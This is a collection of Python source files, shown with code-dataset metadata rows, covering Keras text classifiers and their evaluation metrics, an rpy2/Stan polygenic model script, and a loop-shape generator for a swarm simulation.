str_output+= "P-weighted (>="+str(average_occ)+"): "+str(fp_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(fr_weighted)+"\n\n"
str_output+="Recall@1: "+str(frecall_at_1)+"\n"
str_output+="Recall@2: "+str(frecall_at_2)+"\n"
str_output+="Recall@5: "+str(frecall_at_5)+"\n"
str_output+="Recall@10: "+str(frecall_at_10)+"\n"
str_output+= "-------ONLY UNFREQUENT SPELLS-------\n\n"
str_output+= "F-macro: (<"+str(average_occ)+"): "+str(uf_macro)+"\n"
str_output+= "P-macro: (<"+str(average_occ)+"): "+str(up_macro)+"\n"
str_output+= "R-macro: (<"+str(average_occ)+"): "+str(ur_macro)+"\n\n"
str_output+= "F-micro: (<"+str(average_occ)+"): "+str(uf_micro)+"\n"
str_output+= "P-micro: (<"+str(average_occ)+"): "+str(up_micro)+"\n"
str_output+= "R-micro: (<"+str(average_occ)+"): "+str(ur_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(uf_weighted)+"\n"
str_output+= "P-weighted (>="+str(average_occ)+"): "+str(up_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(ur_weighted)+"\n\n"
str_output+="Recall@1: "+str(urecall_at_1)+"\n"
str_output+="Recall@2: "+str(urecall_at_2)+"\n"
str_output+="Recall@5: "+str(urecall_at_5)+"\n"
str_output+="Recall@10: "+str(urecall_at_10)+"\n\n"
str_output+= "-------SUMMARY---------\n\n"
str_output+=str(x)
#print str(x)
labels = [self.labelsi[l] for l in predicted_output]
return str_output, list_summary, labels
class MajorityClassHP(ModelHP):
def __init__(self,labels, majority_class=None):
self.name_classifier = "HP_MAJORITY"
self.majority_class = majority_class
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
def train(self, training_data, dev_data, train_conf, name_model):
labels = []
for sample in training_data:
sample_split = sample.split("\t")
label,text = sample_split[1], sample_split[2]
labels.append(label)
counter = Counter(labels)
self.majority_class = counter.most_common(1)[0][0]
return None
def predict(self, test_data):
return [self.ilabels[self.majority_class]]*len(test_data)
def evaluate(self,test_data, predicted_output):
def recall_at_k(preds, gold, k):
recall = 0.
for p,g in zip(preds,gold):
if g == p: recall+=1
return recall / len(gold)
gold_output = [self.ilabels[sample.split("\t")[1]]
for sample in test_data]
counter_labels = Counter(gold_output)
average_occ = np.average(counter_labels.values())
fgold_output = [g for g in gold_output if counter_labels[g] >= average_occ]
ugold_output = [g for g in gold_output if counter_labels[g] < average_occ]
fpredicted_output, upredicted_output = [],[]
test_frequent_output = []
gold_frequent_output = []
test_unfrequent_output = []
gold_unfrequent_output = []
assert(len(gold_output) == len(predicted_output))
for j,sample_out in enumerate(predicted_output):
if counter_labels[gold_output[j]] >= average_occ:
fpredicted_output.append(sample_out)
test_frequent_output.append(sample_out)
gold_frequent_output.append(gold_output[j])
else:
upredicted_output.append(sample_out)
gold_unfrequent_output.append(gold_output[j])
test_unfrequent_output.append(sample_out)
#Calculating Recall@K with Precision@K and F1-score@K
recall_at_1 = recall_at_k(predicted_output, gold_output, 1)
recall_at_2 = recall_at_k(predicted_output, gold_output,2)
recall_at_5 = recall_at_k(predicted_output, gold_output, 5)
recall_at_10 = recall_at_k(predicted_output, gold_output, 10)
frecall_at_1 = recall_at_k(test_frequent_output, gold_frequent_output, 1)
frecall_at_2 = recall_at_k(test_frequent_output, gold_frequent_output, 2)
frecall_at_5 = recall_at_k(test_frequent_output, gold_frequent_output, 5)
frecall_at_10 = recall_at_k(test_frequent_output, gold_frequent_output, 10)
urecall_at_1 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 1)
urecall_at_2 = recall_at_k(test_unfrequent_output, gold_unfrequent_output,2)
urecall_at_5 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 5)
urecall_at_10 = recall_at_k(test_unfrequent_output, gold_unfrequent_output, 10)
precision, recall, fscore, support = score(gold_output, predicted_output)
accuracy = sklearn.metrics.accuracy_score(gold_output, predicted_output)
fprecision, frecall, ffscore, fsupport = score(fgold_output, fpredicted_output)
uprecision, urecal, ufscore, usupport = score(ugold_output, upredicted_output)
p_macro, r_macro, f_macro, support_macro = score(gold_output, predicted_output,
average = "macro")
p_micro, r_micro, f_micro, support_micro = score(gold_output, predicted_output,
average = "micro")
p_weighted, r_weighted, f_weighted, support_weighted = score(gold_output, predicted_output,
average = "weighted")
fp_macro, fr_macro, ff_macro, fsupport_macro = score(fgold_output, fpredicted_output,
average = "macro")
fp_micro, fr_micro, ff_micro, fsupport_micro = score(fgold_output, fpredicted_output,
average = "micro")
fp_weighted, fr_weighted, ff_weighted, fsupport_weigthed = score(fgold_output, fpredicted_output,
average = "weighted")
up_macro, ur_macro, uf_macro, usupport_macro = score(ugold_output, upredicted_output,
average = "macro")
up_micro, ur_micro, uf_micro, usupport_micro = score(ugold_output, upredicted_output,
average = "micro")
up_weighted, ur_weighted, uf_weighted, usupport_micro = score(ugold_output, upredicted_output,
average = "weighted")
list_summary = [accuracy, p_macro, r_macro, f_macro, p_micro, r_micro, f_micro, p_weighted, r_weighted, f_weighted,
recall_at_1, recall_at_2, recall_at_5, recall_at_10,
fp_macro, fr_macro, ff_macro, fp_micro, fr_micro, ff_micro, fp_weighted,fr_weighted, ff_weighted,
frecall_at_1, frecall_at_2, frecall_at_5, frecall_at_10,
up_macro, ur_macro,uf_macro, up_micro, ur_micro, uf_micro,up_weighted, ur_weighted, uf_weighted,
urecall_at_1, urecall_at_2, urecall_at_5, urecall_at_10]
x = PrettyTable()
x.add_column("Label", [self.labelsi[i] for i in range(len(self.labelsi))
if i in gold_output or i in predicted_output])
x.add_column("Precision", precision)
x.add_column("Recall", recall)
x.add_column("F-score", fscore)
x.add_column("Support", support)
str_output= "Accuracy: "+str(accuracy)+"\n\n"
str_output+= "F-macro: "+str(f_macro)+"\n"
str_output+= "P-macro: "+str(p_macro)+"\n"
str_output+= "R-macro: "+str(r_macro)+"\n\n"
str_output+= "F-micro: "+str(f_micro)+"\n"
str_output+= "P-micro: "+str(p_micro)+"\n"
str_output+= "R-micro: "+str(r_micro)+"\n\n"
str_output+= "F-weighted: "+str(f_weighted)+"\n"
str_output+= "P-weighted: "+str(p_weighted)+"\n"
str_output+= "R-weighted: "+str(r_weighted)+"\n"
str_output+="Recall@1: "+str(recall_at_1)+"\n"
str_output+="Recall@2: "+str(recall_at_2)+"\n"
str_output+="Recall@5: "+str(recall_at_5)+"\n"
str_output+="Recall@10: "+str(recall_at_10)+"\n\n"
str_output+= "-------ONLY FREQUENT SPELLS-------\n\n"
str_output+= "F-macro (>="+str(average_occ)+"): "+str(ff_macro)+"\n"
str_output+= "P-macro (>="+str(average_occ)+"): "+str(fp_macro)+"\n"
str_output+= "R-macro (>="+str(average_occ)+"): "+str(fr_macro)+"\n\n"
str_output+= "F-micro (>="+str(average_occ)+"): "+str(ff_micro)+"\n"
str_output+= "P-micro (>="+str(average_occ)+"): "+str(fp_micro)+"\n"
str_output+= "R-micro (>="+str(average_occ)+"): "+str(fr_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(ff_weighted)+"\n"
str_output+= "P-weighted (>="+str(average_occ)+"): "+str(fp_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(fr_weighted)+"\n"
str_output+="Recall@1: "+str(frecall_at_1)+"\n"
str_output+="Recall@2: "+str(frecall_at_2)+"\n"
str_output+="Recall@5: "+str(frecall_at_5)+"\n"
str_output+="Recall@10: "+str(frecall_at_10)+"\n"
str_output+= "-------ONLY UNFREQUENT SPELLS-------\n\n"
str_output+= "F-macro: (<"+str(average_occ)+"): "+str(uf_macro)+"\n"
str_output+= "P-macro: (<"+str(average_occ)+"): "+str(up_macro)+"\n"
str_output+= "R-macro: (<"+str(average_occ)+"): "+str(ur_macro)+"\n\n"
str_output+= "F-micro: (<"+str(average_occ)+"): "+str(uf_micro)+"\n"
str_output+= "P-micro: (<"+str(average_occ)+"): "+str(up_micro)+"\n"
str_output+= "R-micro: (<"+str(average_occ)+"): "+str(ur_micro)+"\n\n"
str_output+= "F-weighted (>="+str(average_occ)+"): "+str(uf_weighted)+"\n"
str_output+= "P-weighted (>="+str(average_occ)+"): "+str(up_weighted)+"\n"
str_output+= "R-weighted (>="+str(average_occ)+"): "+str(ur_weighted)+"\n"
str_output+="Recall@1: "+str(urecall_at_1)+"\n"
str_output+="Recall@2: "+str(urecall_at_2)+"\n"
str_output+="Recall@5: "+str(urecall_at_5)+"\n"
str_output+="Recall@10: "+str(urecall_at_10)+"\n\n"
str_output+= "-------SUMMARY---------\n\n"
str_output+=str(x)
#print str(x)
labels = [self.labelsi[l] for l in predicted_output]
# print [self.labelsi[lid] for lid in predicted_output]
return str_output, list_summary, labels
class LogisticRegressionHP(ModelHP):
"""
A logistic regression implemented with Keras
"""
def __init__(self,conf,forms, labels, options):
self.name_classifier = "HP_MLR"
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(forms))}
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.n_labels = len(self.ilabels)
model = Sequential()
model.add(Dense(self.n_labels, input_dim=len(self.iforms)+len(self.SPECIAL_INDEXES), activation='softmax'))
model.compile(loss='categorical_crossentropy',
optimizer="adam",#keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.999, epsilon=None, decay=0.0, amsgrad=False),#'sgd',
metrics=['accuracy'])
self.model = model
self.options = options
class PerceptronHP(ModelHP):
def __init__(self,conf, vocab,labels, options):
self.name_classifier = "HP_MLP"
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.n_labels = len(self.ilabels)
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(vocab))}
input_iw = Input(shape=(len(self.iforms)+len(self.SPECIAL_INDEXES),), name="input", dtype='float32')
x = input_iw
for l in range(0,int(self.conf[LAYERS])):
x = Dense(int(self.conf[NEURONS]))(x)
x = Dropout(float(self.conf[DROPOUT]))(x)
x = Activation('relu')(x)
x = Dense(self.n_labels)(x)
output = Activation('softmax', name='output')(x)
model = Model(inputs = [input_iw], outputs = [output])
model.compile(loss="categorical_crossentropy",
optimizer="adam",#keras.optimizers.SGD(lr=0.01, momentum=0.0, decay=1e-6, nesterov=False),
metrics=['accuracy'])
self.model = model
self.options = options
class SequenceModelHP(ModelHP):
def _get_indexes(self,sentence):
input = []
input_ext = []
for word in sentence:
index = self.UNK_WORD_INDEX
if word in self.iforms and self.vocab[word] > 1:
index = self.iforms[word]
elif word.lower() in self.iforms and self.vocab[word] > 1:
index = self.iforms[word.lower()]
input.append(index)
index = self.UNK_WORD_INDEX
if word in self.ieforms:
index = self.ieforms[word]
elif word.lower() in self.ieforms:
index = self.ieforms[word.lower()]
input_ext.append(index)
return np.array(input), np.array(input_ext)
def generate_data_test(self, lines, batch_size):
i = 0
while i < len(lines):
#while True:
batch_sample = 0
x = []
x_ext = []
y = []
while batch_sample < batch_size and i<len(lines):
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
sample = ls[2].split()[-self.sequence_length:]
x1,x2 = self._get_indexes(sample)
x.append(x1)
x_ext.append(x2)
batch_sample+=1
i+=1
x = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
truncating='pre', value=0.)
x_ext = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
truncating='pre', value=0.)
x = np.array(x)
x_ext = np.array(x_ext)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
if batch_size == 1:
y.reshape(-1,batch_size,y.shape[1])
yield ([x,x_ext],[y])
def generate_data(self, lines, batch_size):
i = 0
while True:
batch_sample = 0
x = []
x_ext = []
y = []
while batch_sample < batch_size:
if i >= len(lines):
i=0 #We prepare the indexes for the next iteration
ls = lines[i].split('\t')
y.append(self.ilabels[ls[1]])
sample = []
sample = ls[2].split()[-self.sequence_length:]
x1,x2 = self._get_indexes(sample)
x.append(x1)
x_ext.append(x2)
batch_sample+=1
i+=1
x = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
truncating='pre', value=0.)
x_ext = keras.preprocessing.sequence.pad_sequences(x, maxlen=self.sequence_length, dtype='int32',
truncating='pre', value=0.)
x = np.array(x)
x_ext = np.array(x_ext)
y = keras.utils.to_categorical(y, num_classes = len(self.ilabels))
y.reshape(-1,batch_size,y.shape[1])
yield ([x,x_ext],[y])
class RNNHP(SequenceModelHP):
def __init__(self, conf, vocab, labels, options):
self.vocab = vocab
self.name_classifier = "HP_RNN"
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.n_labels = len(self.ilabels)
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(vocab))}
self.dims = int(self.conf[DIM_EMBEDDINGS])
self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES),self.dims))
self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
self.iforms_reverse = {self.iforms[w]:w for w in self.iforms}
self.ieforms_reverse = {self.ieforms[w]:w for w in self.ieforms}
self.sequence_length = int(self.conf[TIMESTEPS])
input = Input(shape=(self.sequence_length,), dtype='float32')
input_ext = Input(shape=(self.sequence_length,), dtype='float32')
embedding_layer = Embedding(self.w_lookup.shape[0],
self.dims,
embeddings_initializer="glorot_uniform",
input_length=self.sequence_length,
name = "e_IW",
trainable=True)(input)
e_embedding_layer = Embedding(self.ew_lookup.shape[0],
self.edims,
weights=[self.ew_lookup],
input_length=self.sequence_length,
name = "e_EW",
trainable=True)(input_ext)
x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
dr = float(self.conf[DROPOUT])
for l in range(0,int(self.conf[LAYERS])):
if l == len(range(0, int(self.conf[LAYERS]))):
sequences = True
else:
sequences = False
x = SimpleRNN(int(self.conf[NEURONS]), return_sequences=sequences, dropout= dr)(x)
for l in range(0, int(self.conf[MLP_LAYERS])):
x = Dense(int(self.conf[MLP_NEURONS]))(x)
x = Dropout(float(self.conf[DROPOUT]))(x)
x = Activation('relu')(x)
preds = Dense(self.n_labels, activation='softmax')(x)
model = Model(inputs = [input,input_ext], outputs=[preds])
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
self.model = model
self.options = options
class LSTMHP(SequenceModelHP):
def __init__(self, conf, vocab,labels, options):
self.vocab = vocab
self.name_classifier = "HP_LSTM"
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.n_labels = len(self.ilabels)
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(vocab))}
self.dims = int(self.conf[DIM_EMBEDDINGS])
self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES),self.dims))
self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
self.iforms_reverse = {self.iforms[w]:w for w in self.iforms}
self.ieforms_reverse = {self.ieforms[w]:w for w in self.ieforms}
self.sequence_length = int(self.conf[TIMESTEPS])
input = Input(shape=(self.sequence_length,), dtype='float32')
input_ext = Input(shape=(self.sequence_length,), dtype='float32')
embedding_layer = Embedding(self.w_lookup.shape[0],
self.dims,
embeddings_initializer="glorot_uniform",
input_length=self.sequence_length,
name = "e_IW",
trainable=True)(input)
e_embedding_layer = Embedding(self.ew_lookup.shape[0],
self.edims,
weights=[self.ew_lookup],
input_length=self.sequence_length,
name = "e_EW",
trainable=True)(input_ext)
x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
bidirectional = self.conf[BIDIRECTIONAL].lower() == "true"
dr = float(self.conf[DROPOUT])
for l in range(1,int(self.conf[LAYERS])+1):
if l < int(self.conf[LAYERS]):
sequences = True
else:
sequences = False
if bidirectional:
x = Bidirectional(LSTM(int(self.conf[NEURONS]), dropout=dr, recurrent_dropout=dr,
return_sequences=sequences))(x)
else:
x = LSTM(int(self.conf[NEURONS]), dropout=dr, #recurrent_dropout=dr,
return_sequences=sequences)(x)
for l in range(0, int(self.conf[MLP_LAYERS])):
x = Dense(int(self.conf[MLP_NEURONS]))(x)
x = Dropout(float(self.conf[DROPOUT]))(x)
x = Activation('relu')(x)
preds = Dense(self.n_labels, activation='softmax')(x)
model = Model(inputs = [input,input_ext], outputs=[preds])
model.compile(loss='categorical_crossentropy',
optimizer="adam", #keras.optimizers.Adam(lr=1e-3, decay=0),#keras.optimizers.SGD(lr=0.01, momentum=0.7, decay=0.0, nesterov=False),
metrics=['accuracy'])
model.summary()
self.model = model
self.options = options
class CNNHP(SequenceModelHP):
def __init__(self, conf,vocab,labels, options):
self.vocab = vocab
self.name_classifier = "HP_CNN"
self.conf = conf
self.ilabels ={l:i for i,l in enumerate(sorted(labels))}
self.n_labels = len(self.ilabels)
self.labelsi = {self.ilabels[l]: l for l in self.ilabels}
self.iforms = {w:self.INIT_REAL_INDEX+i for i,w in enumerate(sorted(vocab))}
self.dims = int(self.conf[DIM_EMBEDDINGS])
self.w_lookup = np.zeros(shape=(len(vocab) + len(self.SPECIAL_INDEXES),self.dims))
self.ieforms, self.ew_lookup, self.edims = model_utils._read_embedding_file(self.conf[EXTERNAL_EMBEDDINGS])
self.iforms_reverse = {self.iforms[w]:w for w in self.iforms}
self.ieforms_reverse = {self.ieforms[w]:w for w in self.ieforms}
self.sequence_length = int(self.conf[TIMESTEPS])
input = Input(shape=(self.sequence_length,), dtype='float32')
input_ext = Input(shape=(self.sequence_length,), dtype='float32')
embedding_layer = Embedding(self.w_lookup.shape[0],
self.dims,
embeddings_initializer="glorot_uniform",
#weights=[self.w_lookup],
input_length=self.sequence_length,
name = "e_IW",
trainable=True)(input)
e_embedding_layer = Embedding(self.ew_lookup.shape[0],
self.edims,
weights=[self.ew_lookup],
input_length=self.sequence_length,
name = "e_EW",
trainable=True)(input_ext)
x = keras.layers.concatenate([embedding_layer, e_embedding_layer], axis=-1)
dr = float(self.conf[DROPOUT])
filters = int(self.conf[FILTERS])
kernel_size =int(self.conf[KERNEL_SIZE])
# we add a Convolution1D, which will learn filters
# word group filters of size filter_length:
for l in range(0, int(self.conf[LAYERS])):
x =Conv1D(filters,
kernel_size,
padding='valid',
activation='relu',
strides=1)(x)
x = GlobalMaxPooling1D()(x)
for l in range(0, int(self.conf[MLP_LAYERS])):
x = Dense(int(self.conf[MLP_NEURONS]))(x)
x = Dropout(float(self.conf[DROPOUT]))(x)
x = Activation('relu')(x)
preds = Dense(self.n_labels, activation='softmax')(x)
model = Model(inputs = [input, input_ext], outputs=[preds])
model.compile(loss='categorical_crossentropy',
optimizer='adam',
metrics=['accuracy'])
model.summary()
self.model = model
| 41.075132 | 153 | 0.55235 | 4,576 | 38,816 | 4.432692 | 0.074519 | 0.039933 | 0.042398 | 0.028397 | 0.816111 | 0.805561 | 0.796786 | 0.77884 | 0.767107 | 0.743936 | 0 | 0.011794 | 0.32721 | 38,816 | 944 | 154 | 41.118644 | 0.764924 | 0.026742 | 0 | 0.725732 | 0 | 0 | 0.059757 | 0.004611 | 0 | 0 | 0 | 0 | 0.004623 | 1 | 0.032357 | false | 0 | 0.038521 | 0.001541 | 0.104777 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
8ea2aa7eca5e1d774219216dc17262b1f9cdc9db | 7,333 | py | Python | gbe_browser/optimized.py | whyrg/GlobalBiobankEngine | 514f16eaaae16f0459b40cd1080c9243f007ec91 | [
"MIT"
] | null | null | null | gbe_browser/optimized.py | whyrg/GlobalBiobankEngine | 514f16eaaae16f0459b40cd1080c9243f007ec91 | [
"MIT"
] | null | null | null | gbe_browser/optimized.py | whyrg/GlobalBiobankEngine | 514f16eaaae16f0459b40cd1080c9243f007ec91 | [
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import division
from random import shuffle
# Written by Manuel A. Rivas
# Updated 04.21.2017
import sys,re
import os
import numpy
import rpy2.robjects as ro
import rpy2.robjects.numpy2ri
rpy2.robjects.numpy2ri.activate()
def Polygenic(key, betas, ses, labels, chains = 8, iter = 200, warmup = 100, cores = 8):
nstudies = len(labels)
labels = numpy.array(labels)
betas = numpy.array(betas)
ses = numpy.array(ses)
fn = 'static/images/Polygenic/Polygenic_' + str(key) + '.svg'
ro.r('''
covarr<-function(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores){
library(rstan)
require(ggplot2)
require(corpcor)
require(RColorBrewer)
library(ggthemes)
# Create data for Stan
stan.data <- list(
N = nrow(betas),
M = ncol(betas),
B = betas,
SE = ses,
K = 2
)
sm <- stan_model(file = "model2_mixture.stan")
fit2 = optimizing(sm, data = stan.data, hessian = TRUE, as_vector=FALSE)
#fit2 = vb(sm, data = stan.data)
#print(fit2)
# fit2 <- stan(
# file = "model2_mixture.stan", # Stan program
# data = stan.data, # named list of data
# chains = 8, # number of Markov chains
# warmup = 100, # number of warmup iterations per chain
# iter = iter, # total number of iterations per chain
# cores = 8, # number of cores (using 2 just for the vignette)
# refresh = 50 # show progress every 'refresh' iterations
# )
#print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), probs=c(0.025, 0.5, 0.975), digits_summary=5)
#print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), digits_summary=5)
#print(fit2, pars = c("L_omega","L_Theta","tau","pi","Omegacor","Thetacor"))
print(fit2$par$pi)
print(fit2$par$Omegacor)
print(fit2$par$Thetacor)
print(labels)
#mylabels = c("tau","pi", rev(labels),"Thetacor")
#mylabels = c(rep(1,nstudies),rep(1,2),rep(1,nstudies*nstudies),rep(1,nstudies*nstudies))
#d = cbind(rep("tau_",nstudies),rev(labels))
#colnames(d) = c("id","val")
#d = data.frame(d)
#mylabels[1:nstudies] = with(d,paste0(id,val))
#mylabels[nstudies+1] = "pi_m1"
#mylabels[nstudies+2] = "pi_null"
#labelsrev = rev(labels)
#init = nstudies + 2
#for(i in 1:nstudies){
# for(j in 1:nstudies){
# init = init + 1
# mylabels[init] = paste(c("cor_e_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
#}
#}
#for(i in 1:nstudies){
# for(j in 1:nstudies){
# init = init + 1
# mylabels[init] = paste(c("cor_g_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
#}
#}
#print(mylabels)
#p.1 <- plot(fit2, pars=c("Omegacor", "Thetacor", "pi", "tau"))
#p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_wsj() + scale_colour_wsj("colors6", "")
#ggsave(fn, plot = p.1, width = 8, height = 8, device = "svg")
#p.2 <- traceplot(fit2, pars = c( "tau","pi","Omegacor","Thetacor"), inc_warmup = TRUE, nrow = 5) + theme_wsj() + scale_colour_wsj("colors6", "")
#ggsave(paste(c(fn,2,".svg"), sep = "", collapse=""), plot = p.2, width = 8, height = 8, device = "svg")
## extract the simulated draws from the posterior and note the number for nsims
#theta = extract(fit2)
#print(names(theta))
#nsims = length(theta$Sigmas)
#print(nsims)
#print(dim(theta$Sigmas))
#save.image(paste(fn, ".RData", sep=""))
}
''')
covarf = ro.globalenv['covarr']
covarf = ro.r['covarr']
res = covarf(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores)
## START NEW
def PolygenicCoding(key, betas, ses, labels, chains = 8, iter = 200, warmup = 100, cores = 8):
nstudies = len(labels)
labels = numpy.array(labels)
betas = numpy.array(betas)
ses = numpy.array(ses)
fn = 'static/images/PolygenicCoding/PolygenicCoding_' + str(key) + '.svg'
ro.r('''
covarr<-function(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores){
library(rstan)
require(ggplot2)
require(RColorBrewer)
library(ggthemes)
require(svglite)
# Create data for Stan
stan.data <- list(
N = nrow(betas),
M = ncol(betas),
B = betas,
SE = ses,
K = 2
)
sm <- stan_model(file = "model2_mixture.stan")
#fit2 = optimizing(sm, data = stan.data, hessian = TRUE, as_vector=FALSE)
#fit2 = vb(sm, data = stan.data)
#print(fit2)
fit2 <- stan(
file = "model2_mixture.stan", # Stan program
data = stan.data, # named list of data
chains = 4, # number of Markov chains
warmup = 100, # number of warmup iterations per chain
iter = iter, # total number of iterations per chain
cores = 8, # number of cores (using 2 just for the vignette)
refresh = 50 # show progress every 'refresh' iterations
)
print(fit2, pars=c("L_Omega", "L_Theta", "tau", "pi","Omegacor","Thetacor"), probs=c(0.025, 0.5, 0.975), digits_summary=5)
#print(fit2$par$pi)
#print(fit2$par$Omegacor)
#print(fit2$par$Thetacor)
#print(labels)
mylabels = c("tau","pi", rev(labels),"Thetacor")
mylabels = c(rep(1,nstudies),rep(1,2),rep(1,nstudies*nstudies),rep(1,nstudies*nstudies))
d = cbind(rep("tau_",nstudies),rev(labels))
colnames(d) = c("id","val")
d = data.frame(d)
mylabels[1:nstudies] = with(d,paste0(id,val))
mylabels[nstudies+1] = "pi_m1"
mylabels[nstudies+2] = "pi_null"
labelsrev = rev(labels)
init = nstudies + 2
for(i in 1:nstudies){
for(j in 1:nstudies){
init = init + 1
mylabels[init] = paste(c("cor_e_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
}
}
for(i in 1:nstudies){
for(j in 1:nstudies){
init = init + 1
mylabels[init] = paste(c("cor_g_", labelsrev[j], "_", labelsrev[i]), sep = "", collapse="")
}
}
print(mylabels)
p.1 <- plot(fit2, pars=c("Omegacor", "Thetacor", "pi", "tau"))
p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_wsj() + scale_colour_wsj("colors6","")
#p.1 <- p.1 + scale_y_continuous(labels = mylabels, breaks = seq(1,length(mylabels))) + theme_hc() + scale_colour_hc("colors6", "")
# svg(file = fn, width = 8, height = 8)
# p.1
# dev.off()
p.2 <- traceplot(fit2, pars = c( "tau","pi","Omegacor","Thetacor"), inc_warmup = TRUE, nrow = 5) + theme_wsj() + scale_colour_wsj("colors6", "")
# svg(file = paste(c(fn,2,".svg"), sep = "", collapse=""), width = 8, height = 8)
# p.2
# dev.off()
ggsave(fn, plot = p.1, width = 8, height = 8, device = "svg")
ggsave(paste(c(fn,2,".svg"), sep = "", collapse=""), plot = p.2, width = 8, height = 8, device = "svg")
## extract the simulated draws from the posterior and note the number for nsims
#theta = extract(fit2)
#print(names(theta))
#nsims = length(theta$Sigmas)
#print(nsims)
#print(dim(theta$Sigmas))
#save.image(paste(fn, ".RData", sep=""))
}
''')
covarf = ro.globalenv['covarr']
covarf = ro.r['covarr']
res = covarf(nstudies, fn, betas, ses, labels, chains, iter, warmup, cores)
| 30.810924 | 146 | 0.601255 | 1,009 | 7,333 | 4.299306 | 0.182359 | 0.033195 | 0.016598 | 0.027663 | 0.898571 | 0.892116 | 0.892116 | 0.886814 | 0.886814 | 0.886814 | 0 | 0.030734 | 0.22351 | 7,333 | 237 | 147 | 30.940928 | 0.73112 | 0.0075 | 0 | 0.454545 | 0 | 0.142045 | 0.861073 | 0.193535 | 0 | 0 | 0 | 0 | 0 | 1 | 0.011364 | false | 0 | 0.045455 | 0 | 0.056818 | 0.130682 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
d930510999cab2e306c250696eb95a3007fda61d | 34,561 | py | Python | loop-data2/shape_gen_script.py | yangliu28/swarm_formation_sim | 5c6dd025667338103500c35b2ecee7aceec886a1 | [
"MIT"
] | 61 | 2018-06-22T17:57:18.000Z | 2022-03-24T11:19:28.000Z | loop-data2/shape_gen_script.py | yangliu28/swarm_formation_sim | 5c6dd025667338103500c35b2ecee7aceec886a1 | [
"MIT"
] | null | null | null | loop-data2/shape_gen_script.py | yangliu28/swarm_formation_sim | 5c6dd025667338103500c35b2ecee7aceec886a1 | [
"MIT"
] | 23 | 2018-06-20T09:18:30.000Z | 2022-03-14T19:39:35.000Z | # script to generate files for the loop shapes
# each block of code generates one loop shape
import pickle
import os
import math
import pygame
import numpy as np
# general function to reset radian angle to [-pi, pi)
def reset_radian(radian):
while radian >= math.pi:
radian = radian - 2*math.pi
while radian < -math.pi:
radian = radian + 2*math.pi
return radian
# general function to calculate next position node along a heading direction
def cal_next_node(node_poses, index_curr, heading_angle, rep_times):
for _ in range(rep_times):
index_next = index_curr + 1
x = node_poses[index_curr][0] + 1.0*math.cos(heading_angle)
y = node_poses[index_curr][1] + 1.0*math.sin(heading_angle)
node_poses[index_next] = np.array([x,y])
index_curr = index_next
return index_next
# ##### script to generate 30-square #####
# filename = '30-square'
# swarm_size = 30
# node_poses = np.zeros((swarm_size, 2))
# x = 0.0
# y = 0.0
# # bottom side line
# # first node starting from bottom left corner
# node_poses[0] = np.array([0.0, 0.0])
# for i in range(1,8):
# x = x + 1.0
# node_poses[i] = np.array([x,y])
# # right line line
# x = x + 1.0 / math.sqrt(2)
